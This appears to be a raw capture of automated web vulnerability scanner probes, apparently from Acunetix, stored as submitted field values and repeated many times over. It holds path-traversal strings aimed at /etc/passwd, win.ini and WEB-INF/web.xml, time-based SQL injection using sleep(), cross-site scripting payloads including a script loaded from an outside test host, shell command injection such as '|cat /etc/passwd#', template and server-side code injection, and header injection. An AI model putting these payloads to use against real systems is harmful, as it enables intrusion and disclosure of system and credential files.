../../../../../../../../../../etc/passwd.jpg

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(914146)>

1

1

`cat /etc/passwd`

1

1

-1

1

${99417+99695}

1<ScRiPt%20>prompt(968082)</sCripT>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

1

1&n918702=v977231

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1))

1some_inexistent_file_with_long_name%00.jpg

)

'|'ld

1

<img acu onmouseover=prompt(992398) //>

1

1

ghQJbuXe'

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

'"()

1<input autofocus onfocus=prompt(950282)>

LlI1w9nr')

testasp.vulnweb.com

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

zgt8NoVs'))

1

1

"

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

/etc/passwd

-1

1

"

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1_7RjNS <ScRiPt >prompt(909019)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

1

1

1

1

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

1

1

http://hitHsJg0zZax8.bxss.me/

acunetix_wvs_invalid_filename

1

................etc/passwd

1

aUEGEgaY'

1

1

comments

1

'&dir&'

1

7iQYP9FS')

1

http://www.acunetix.tst

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"&dir&"

'"

1

XVV95Q8s'))

1

1'"()&%<ScRiPt >prompt(922803)</ScRiPt>

file:///etc/passwd

1

comments/.

<!--

1

1

1

|dir

1

1

'"()&%<ScRiPt >prompt(991744)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_993340

'|dir

1

WEB-INF/web.xml

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

windowswin.ini

1

acu10902<s1﹥s2ʺs3ʹuca10902

1

1

................windowswin.ini

acux4490z1z2abcxuca4490

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(952273)</ScRiPt>

1

1

response.write(9563278*9720104)

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<script>prompt(964167)</script>

'+response.write(9563278*9720104)+'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1<ScRiPt >prompt(972339)</ScRiPt>

"+response.write(9563278*9720104)+"

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'&cat /etc/passwd&'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935890></ScRiPt>

1

1

1

1

1

1<ScRiPt >prompt(948461)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9.045),0)/*'XOR(if(now()=sysdate(),sleep(9.045),0))OR'"XOR(if(now()=sysdate(),sleep(9.045),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<video><source onerror="javascript:prompt(940938)">

1

1

1

cat /etc/passwd

WEB-INF/web.xml

(select(0)from(select(sleep(9.045)))v)/*'+(select(0)from(select(sleep(9.045)))v)+'"+(select(0)from(select(sleep(9.045)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933345)"></g></svg>

${99119+99007}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF\web.xml

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<div style=width:expression(prompt(909782))>

`cat /etc/passwd`

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n950513=v975002

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<iframe src='data:text/html

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<body onload=prompt(961918)>

boHjF5rv'

testasp.vulnweb.com

'|'ld

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

E7X3y9Eq')

!(()&&!|*|*|

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(962887)>

"|"ld

1

Pa7I5DtP'))

'

'"()

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1<img src=xyz OnErRor=prompt(924037)>

1

"

-1

1

1

1

1<img/src=">" onerror=alert(954436)>

.\./.\./.\./.\./.\./.\./etc/passwd

1

-1)

${@print(md5(acunetix_wvs_security_test))}

'

1

1

1

1

-1))

1

1<ScRiPt%20>prompt(957118)</sCripT>

${@print(md5(acunetix_wvs_security_test))}\

/etc/passwd

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

http://hitYERD5C1XK7.bxss.me/

1

m6GZfEGo'

1&lt

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

cRyPIJjE')

<img acu onmouseover=prompt(965149) //>

1

1

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

iOLgERPq'))

1<input autofocus onfocus=prompt(943809)>

1

................etc/passwd

1

comments

1

'&dir&'

http://www.acunetix.tst

<a href='http://www.acunetix.com'>website security</a>

1

'"

1'"()&%<ScRiPt >prompt(926568)</ScRiPt>

1

comments/.

1

1

"&dir&"

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(940442)</ScRiPt>

<!--

file:///etc/passwd

1

1

1

1_U6ttn <ScRiPt >prompt(969659)</ScRiPt>

1_979655

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1

1

1

1

'|dir

WEB-INF/web.xml

1

1

WEB-INF\web.xml

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

acu9549<s1﹥s2ʺs3ʹuca9549

1

1

acux7834z1z2abcxuca7834

1

1

1

windowswin.ini

1<ScRiPt >prompt(915723)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(991419)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(900636)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987405></ScRiPt>

1

1

1

1<ScRiPt >prompt(974308)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(990703)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9437051*9687892)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939061)"></g></svg>

'+response.write(9437051*9687892)+'

1

1

1<div style=width:expression(prompt(998961))>

"+response.write(9437051*9687892)+"

WEB-INF/web.xml

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(987146)>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943222)>

1

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(939647)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

${99829+99415}

1<img/src=">" onerror=alert(972068)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

1

1

1<ScRiPt%20>prompt(920255)</sCripT>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n978839=v924716

|cat /etc/passwd#

1

1&lt

-1)

testasp.vulnweb.com

)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

-1))

<img acu onmouseover=prompt(979506) //>

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

DkUlammz'

1

^(#$!@#$)(()))******

"|"ld

1<input autofocus onfocus=prompt(992008)>

1

NIF8yODu')

'"()

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1

1

1

9kWZCzP1'))

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

'

'

1

1

[url=http://www.acunetix.com]website security[/url]

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1_Kp1Ih <ScRiPt >prompt(949678)</ScRiPt>

1

1

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

http://hit0Dm9agQqUk.bxss.me/

-1))

acunetix_wvs_invalid_filename

1

1

comments

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

CVTlDzcI'

1

'&dir&'

1

comments

1

1

1

tWZficO3')

1

http://www.acunetix.tst

1

comments/.

"&dir&"

file:///etc/passwd

'"

VAywfRIo'))

1'"()&%<ScRiPt >prompt(960092)</ScRiPt>

1

1

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

|dir

1

'"()&%<ScRiPt >prompt(925907)</ScRiPt>

1

1

1

1

'|dir

WEB-INF/web.xml

1

1_983896

1

1

1

"|dir

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

windowswin.ini

1

1

acu5144<s1﹥s2ʺs3ʹuca5144

1

................windowswin.ini

acux4035z1z2abcxuca4035

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(957614)</ScRiPt>

1

1

1

1<script>prompt(984433)</script>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(959170)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983595></ScRiPt>

1

1

response.write(9861106*9416321)

1

1<ScRiPt >prompt(990894)</ScRiPt>

1

1

&cat /etc/passwd&

'+response.write(9861106*9416321)+'

1<video><source onerror="javascript:prompt(905955)">

1

WEB-INF/web.xml

'&cat /etc/passwd&'

1

"+response.write(9861106*9416321)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987658)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1<div style=width:expression(prompt(967380))>

WEB-INF\web.xml

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(943435)>

1

`cat /etc/passwd`

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

${99653+99144}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965357)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

-1

1

1<img src=xyz OnErRor=prompt(986647)>

1

1

1

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n933530=v994387

1

1<img/src=">" onerror=alert(912802)>

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1<ScRiPt%20>prompt(981720)</sCripT>

1

'"()

1

!(()&&!|*|*|

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

1&lt

Lo76dU8e'

1

1

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

'

3G0NfOug')

1

<img acu onmouseover=prompt(943104) //>

/etc/passwd

1

1

"

1

1

"

1<input autofocus onfocus=prompt(934104)>

1

9efbTnNK'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

http://hitu9pcOqoK3e.bxss.me/

acunetix_wvs_invalid_filename

1

-1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

comments

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1_4jyQd <ScRiPt >prompt(903424)</ScRiPt>

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

................etc/passwd

1

-1))

1

1

'&dir&'

1

comments/.

http://www.acunetix.tst

1

D8yZstKw'

'"

1

1

1'"()&%<ScRiPt >prompt(903076)</ScRiPt>

1

cmc6I1yl')

"&dir&"

file:///etc/passwd

1

<!--

1

'"()&%<ScRiPt >prompt(927840)</ScRiPt>

1

1

Q5EoguP4'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

1_927091

1

1

1

1

WEB-INF/web.xml

1

'|dir

1

1

WEB-INF\web.xml

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1

1

1

................windowswin.ini

acu8788<s1﹥s2ʺs3ʹuca8788

1

1

acux6841z1z2abcxuca6841

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(928409)</ScRiPt>

1

1

1

1<script>prompt(993018)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

response.write(9286584*9164592)

1

1

1<ScRiPt >prompt(988459)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9286584*9164592)+'

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978199></ScRiPt>

"+response.write(9286584*9164592)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

1<ScRiPt >prompt(938825)</ScRiPt>

../../../../../../../../../../etc/passwd

1

1

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(910172)">

1

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(968007)"></g></svg>

WEB-INF\web.xml

1

1

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

${99131+99214}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<div style=width:expression(prompt(938908))>

"&cat /etc/passwd&"

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1some_inexistent_file_with_long_name%00.jpg

1<iframe src='data:text/html

cat /etc/passwd

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1&n993929=v957622

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<body onload=prompt(926485)>

1

`cat /etc/passwd`

1

-1)

testasp.vulnweb.com

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981349)>

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

|cat /etc/passwd#

1

1

-1))

1<img src=xyz OnErRor=prompt(986325)>

1

.\./.\./.\./.\./.\./.\./etc/passwd

!(()&&!|*|*|

0YMJR5Gi'

'"()

'|'ld

1

1<img/src=">" onerror=alert(965098)>

1

1

/etc/passwd

SnPQEdFB')

1

'

1<ScRiPt%20>prompt(959041)</sCripT>

1

^(#$!@#$)(()))******

"|"ld

1

1

3I0uuMuG'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1&lt

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<img acu onmouseover=prompt(908473) //>

-1)

1

'

http://hityvzzGtDSsA.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

1

acunetix_wvs_invalid_filename

1

-1))

1

1<input autofocus onfocus=prompt(923612)>

1

"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

Y2NgEHnQ'

1

1

||cat /etc/passwd

http://www.acunetix.tst

1

'"

file:///etc/passwd

comments

1

L6mitscr')

<a href='http://www.acunetix.com'>website security</a>

1

1'"()&%<ScRiPt >prompt(998770)</ScRiPt>

&dir

<!--

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

0zRm8Eyr'))

'"()&%<ScRiPt >prompt(952554)</ScRiPt>

1

1

'&dir&'

1

[url=http://www.acunetix.com]website security[/url]

1

1

WEB-INF/web.xml

1

1_977159

1

1_QTsGn <ScRiPt >prompt(919077)</ScRiPt>

1

WEB-INF\web.xml

"&dir&"

1

1

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

1

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1

1

acu3861<s1﹥s2ʺs3ʹuca3861

................windowswin.ini

1

1

1

acux3893z1z2abcxuca3893

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(981903)</ScRiPt>

1

1

1<script>prompt(920266)</script>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(956251)</ScRiPt>

1

response.write(9097703*9160466)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956375></ScRiPt>

1

1

1

1

'+response.write(9097703*9160466)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(935114)</ScRiPt>

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1

"+response.write(9097703*9160466)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<video><source onerror="javascript:prompt(931697)">

1

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(996870)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1<div style=width:expression(prompt(969494))>

WEB-INF\web.xml

"&cat /etc/passwd&"

1

1

1

1

1

1<iframe src='data:text/html

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<body onload=prompt(991384)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99204+99982}

cat /etc/passwd

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(937338)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

1

1&n927239=v907798

1<img src=xyz OnErRor=prompt(952515)>

-1)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

|cat /etc/passwd#

1

1

1<img/src=">" onerror=alert(922674)>

-1))

1

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

^(#$!@#$)(()))******

vOaZEg51'

testasp.vulnweb.com

'"()

1<ScRiPt%20>prompt(934552)</sCripT>

1

'|'ld

1

1

1

ylYWxJbg')

1

/etc/passwd

1

1&lt

'

"|"ld

1

1

1

1

f40BpMDh'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<img acu onmouseover=prompt(970525) //>

1

"

-1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(936509)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

'

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

http://hitpNW5k7i4l2.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

1

AMbsf2I9'

1

1_xLFiN <ScRiPt >prompt(945490)</ScRiPt>

"

1

comments

file:///etc/passwd

1

http://www.acunetix.tst

zzDvEb0h')

'"

||cat /etc/passwd

1

1'"()&%<ScRiPt >prompt(923999)</ScRiPt>

comments

/\../\../\../\../\../\../\../etc/passwd

<!--

1

f39OmZHZ'))

1

WEB-INF/web.xml

1

&dir

'"()&%<ScRiPt >prompt(991033)</ScRiPt>

1

comments/.

1

1

Yvivuh55'))

1

1

1

1_975074

'&dir&'

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

"&dir&"

1

1

1

|dir

../../../../../../../../../../boot.ini

1

1

'|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

"|dir

1

1

windowswin.ini

1

1

acu2583<s1﹥s2ʺs3ʹuca2583

1

................windowswin.ini

1

acux4474z1z2abcxuca4474

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(967679)</ScRiPt>

1

1

1<script>prompt(915277)</script>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt >prompt(982109)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?927735></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(907568)</ScRiPt>

response.write(9439575*9333118)

1

1

1

1

1<video><source onerror="javascript:prompt(939174)">

'+response.write(9439575*9333118)+'

1

&cat /etc/passwd&

1

1

"+response.write(9439575*9333118)+"

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959489)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

1<div style=width:expression(prompt(920454))>

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1<iframe src='data:text/html

1

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(3.109),0)/*'XOR(if(now()=sysdate(),sleep(3.109),0))OR'"XOR(if(now()=sysdate(),sleep(3.109),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(951226)>

1

1

1

(select(0)from(select(sleep(3.109)))v)/*'+(select(0)from(select(sleep(3.109)))v)+'"+(select(0)from(select(sleep(3.109)))v)+"*/

`cat /etc/passwd`

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(908175)>

${99970+99774}

1

1

|cat /etc/passwd#

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(916885)>

1&n957604=v985284

1

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

-1)

1

1<img/src=">" onerror=alert(961432)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"|"ld

-1))

1<ScRiPt%20>prompt(976531)</sCripT>

testasp.vulnweb.com

!(()&&!|*|*|

1

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

VrVr5wdj'

^(#$!@#$)(()))******

1

1&lt

'

1

1

'

.\./.\./.\./.\./.\./.\./etc/passwd

1

t3CSWi9g')

1

1

<img acu onmouseover=prompt(961726) //>

/etc/passwd

1

"

"

1

1

CcVj6Nom'))

1

1

1<input autofocus onfocus=prompt(954194)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

-1

1

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1)

1

http://hit6eT6v9CASd.bxss.me/

&dir

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

1

1

1_mQzRF <ScRiPt >prompt(949340)</ScRiPt>

comments

1

1

'&dir&'

................etc/passwd

9t1cOy50'

1'"()&%<ScRiPt >prompt(912167)</ScRiPt>

1

comments

http://www.acunetix.tst

1

'"

"&dir&"

1

1

'"()&%<ScRiPt >prompt(947739)</ScRiPt>

comments/.

2jToqLLd')

|dir

1

<!--

1

1

file:///etc/passwd

1

1

LRa8BWDa'))

1_998845

1

1

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu2005<s1﹥s2ʺs3ʹuca2005

../../../../../../../../../../windows/win.ini.jpg

1

acux10942z1z2abcxuca10942

1

windowswin.ini

1<ScRiPt >prompt(990208)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(983552)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(926340)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960865></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(981191)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(978381)">

response.write(9269910*9758201)

